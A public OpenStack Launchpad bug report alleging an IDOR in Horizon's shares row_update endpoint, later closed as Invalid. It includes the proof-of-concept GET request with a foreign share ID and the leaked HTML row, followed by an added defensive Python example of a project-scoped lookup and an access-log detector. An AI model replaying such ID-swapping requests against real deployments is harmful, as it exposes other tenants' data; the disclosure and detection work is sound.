Given it has been over a year and a half since the reporter acknowledged
they were fixing the configuration error in their environment, and they
haven't responded further to a request for an update in that time, I'm
switching the report to public now.
** Information type changed from Private Security to Public
** Changed in: manila
Status: New => Invalid
--
You received this bug notification because you are a member of Yahoo!
Engineering Team, which is subscribed to OpenStack Dashboard (Horizon).
https://bugs.launchpad.net/bugs/1861895
Title:
IDOR in /dashboard/project/shares/
Status in OpenStack Dashboard (Horizon):
Invalid
Status in OpenStack Shared File Systems Service (Manila):
Invalid
Status in manila-ui:
Invalid
Status in OpenStack Security Advisory:
Invalid
Bug description:
Hello, I believe I found an IDOR to some information about other users'
shares. Not sure if it's a Manila vulnerability; I couldn't map this
Horizon endpoint to the one on the Manila API, hope you can clarify things
for me.
Info:
When sending a request to
/dashboard/project/shares/?action=row_update&table=shares&obj_id=<share_id>,
an attacker can send another user's share ID and disclose information in the response,
such as Name, Description, Size, Status, Visibility, Protocol, Share Network.
Request example, where 33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a is the id of
a share which does not belong to me:
GET /dashboard/project/shares/?action=row_update&table=shares&obj_id=33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a HTTP/1.1
Host: <redacted>
User-Agent: Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:72.0) Gecko/20100101 Firefox/72.0
Accept: */*
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
X-Requested-With: XMLHttpRequest
Connection: close
Referer: https://<redacted>/dashboard/project/shares/
Cookie: <redacted>
Response example:
HTTP/1.1 200 OK
...
Content-Length: 3027
<tr class="ajax-update status_up" data-display="File_storage_3498"
data-display-key="name" data-object-id="33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a"
data-update-interval="2500"
data-update-url="/dashboard/project/shares/?action=row_update&table=shares&obj_id=33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a"
id="shares__row__33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a">
<td class="multi_select_column"><div class="themable-checkbox"><input
class="table-row-multi-select" id="e7b9b987-e705-43aa-a605-f8d585e06768"
name="object_ids" type="checkbox" value="33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a"
/><label for="e7b9b987-e705-43aa-a605-f8d585e06768"></label></div></td><td
class="word-break sortable anchor normal_column"><a
href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/"
>File_storage_3498</a></td><td class="sortable normal_column">
1231
</td><td class="sortable normal_column"></td><td class="sortable
normal_column">
10GiB
</td><td class="status_up sortable normal_column">
Available
</td><td class="sortable normal_column">
private
</td><td class="sortable normal_column">
NFS
</td><td class="sortable normal_column">
File_storage_3498_network
</td><td class="actions_column"><div class="btn-group"><a
id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_edit" class="btn
data-table-action btn-default btn-sm ajax-modal btn-create"
href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/update/">
Edit Share</a><a class="btn btn-default btn-sm dropdown-toggle"
data-toggle="dropdown" href="#"><span class="fa fa-caret-down"></span></a><ul
class="dropdown-menu dropdown-menu-right row_actions"><li><a
id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_extend_share"
class="btn data-table-action ajax-modal btn-create"
href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/extend/">
Extend Share</a></li><li><a
id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_snapshots"
class="btn data-table-action ajax-modal btn-camera"
href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/create_snapshot/">
Create Snapshot</a></li><li><a
id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_manage_rules"
class="btn data-table-action btn-edit"
href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/rules/">
Manage Rules</a></li><li><a
id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_update_metadata"
class="btn data-table-action ajax-modal btn-create"
href="/dashboard/project/shares/33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a/update_metadata/">
Edit Share Metadata</a></li><li><button data-batch-action="true"
id="shares__row_33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a__action_delete"
class="data-table-action btn-danger btn" name="action" help_text="This action
cannot be undone." type="submit"
value="shares__delete__33640e7d-cf07-4ae1-b1d9-c51f7ef13f2a"> Delete
Share</button></li></ul></div></td>
</tr>
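The report above describes a row_update lookup that returns a share's table row for any obj_id the caller supplies. The following is an added example, not code from the Launchpad report or from the Horizon, manila-ui or manila projects: it models that unscoped lookup beside one scoped to the caller's project (returning None, i.e. HTTP 404, for another project's private share), and adds a log check a defender can run over dashboard access logs to flag users who received rows for shares outside their own project. The share inventory, user-to-project mapping, the "public" visibility handling and the access-log lines are all constructed assumptions for illustration.

```python
"""
Added example, not code from the Launchpad report or from Horizon/manila.
Models the row_update lookup the report describes (unscoped by obj_id)
beside a project-scoped lookup, plus a log check that flags users who
fetched rows for shares outside their own project.  All shares,
projects, users and log lines below are constructed sample data.
"""
import re
from dataclasses import dataclass, asdict
from typing import Dict, List, Optional
from urllib.parse import urlparse, parse_qs


@dataclass(frozen=True)
class Share:
    id: str
    project_id: str
    name: str
    size_gib: int
    status: str
    visibility: str  # "private" or "public" (assumed model of a public-share flag)
    protocol: str
    share_network: str


# Constructed inventory: two projects, three shares.
SHARES: Dict[str, Share] = {s.id: s for s in (
    Share("share-a1", "proj-a", "File_storage_0001", 5, "available", "private", "NFS", "net-a"),
    Share("share-b1", "proj-b", "File_storage_3498", 10, "available", "private", "NFS", "File_storage_3498_network"),
    Share("share-b2", "proj-b", "File_storage_pub", 20, "available", "public", "CIFS", "net-b"),
)}


def row_update_unscoped(obj_id: str) -> Optional[dict]:
    """Lookup by ID only: the behaviour the report describes.  Any
    authenticated caller who obtains an ID gets the row's fields."""
    share = SHARES.get(obj_id)
    return asdict(share) if share else None


def row_update_scoped(caller_project: str, obj_id: str) -> Optional[dict]:
    """Lookup scoped to the caller's project.  Another project's private
    share is indistinguishable from a nonexistent one (None -> HTTP 404);
    only shares explicitly marked public are visible across projects."""
    share = SHARES.get(obj_id)
    if share is None:
        return None
    if share.project_id != caller_project and share.visibility != "public":
        return None
    return asdict(share)


# Common-log-style line with the authenticated user in the second field (assumed format).
LOG_RE = re.compile(r'^(?P<ip>\S+) (?P<user>\S+) \[(?P<ts>[^\]]+)\] '
                    r'"(?P<method>\S+) (?P<path>\S+) \S+" (?P<status>\d{3}) (?P<size>\d+)$')


def row_update_obj_id(path: str) -> Optional[str]:
    """Return the obj_id of a shares-table row_update request, else None."""
    url = urlparse(path)
    if not url.path.endswith("/project/shares/"):
        return None
    qs = parse_qs(url.query)
    if qs.get("action") != ["row_update"] or qs.get("table") != ["shares"]:
        return None
    ids = qs.get("obj_id", [])
    return ids[0] if len(ids) == 1 else None


def cross_project_row_fetches(log_lines: List[str],
                              user_project: Dict[str, str]) -> Dict[str, List[str]]:
    """Map each user to the sorted IDs of foreign, non-public shares whose
    rows were served with HTTP 200.  Any non-empty entry means the endpoint
    returned another project's data and the deployment needs investigating."""
    hits: Dict[str, set] = {}
    for line in log_lines:
        m = LOG_RE.match(line)
        if not m or m["status"] != "200":
            continue
        obj_id = row_update_obj_id(m["path"])
        share = SHARES.get(obj_id) if obj_id else None
        project = user_project.get(m["user"])
        if share is None or project is None:
            continue  # unknown share or user: nothing to judge against
        if share.project_id != project and share.visibility != "public":
            hits.setdefault(m["user"], set()).add(share.id)
    return {user: sorted(ids) for user, ids in hits.items()}


# Constructed access-log lines: user_a belongs to proj-a, user_b to proj-b.
SAMPLE_LOG = [
    '198.51.100.7 user_a [10/Feb/2020:12:00:01 +0000] "GET /dashboard/project/shares/?action=row_update&table=shares&obj_id=share-a1 HTTP/1.1" 200 3027',
    '198.51.100.7 user_a [10/Feb/2020:12:00:05 +0000] "GET /dashboard/project/shares/?action=row_update&table=shares&obj_id=share-b1 HTTP/1.1" 200 3027',
    '198.51.100.7 user_a [10/Feb/2020:12:00:09 +0000] "GET /dashboard/project/shares/?action=row_update&table=shares&obj_id=share-b2 HTTP/1.1" 200 3100',
    '203.0.113.9 user_b [10/Feb/2020:12:01:00 +0000] "GET /dashboard/project/shares/?action=row_update&table=shares&obj_id=share-b1 HTTP/1.1" 200 3027',
    '203.0.113.9 user_b [10/Feb/2020:12:01:03 +0000] "GET /dashboard/project/shares/?action=row_update&table=shares&obj_id=share-a1 HTTP/1.1" 404 215',
]
USER_PROJECT = {"user_a": "proj-a", "user_b": "proj-b"}

if __name__ == "__main__":
    print(cross_project_row_fetches(SAMPLE_LOG, USER_PROJECT))
```

In the sample log, user_a receives a 200 for share-b1, a private share of proj-b, so the check reports that user; the public share share-b2 and user_b's 404 for share-a1 are not flagged. The scoped lookup returns None for a foreign private share rather than a distinct "forbidden" result, so a caller cannot use the endpoint to confirm which IDs exist.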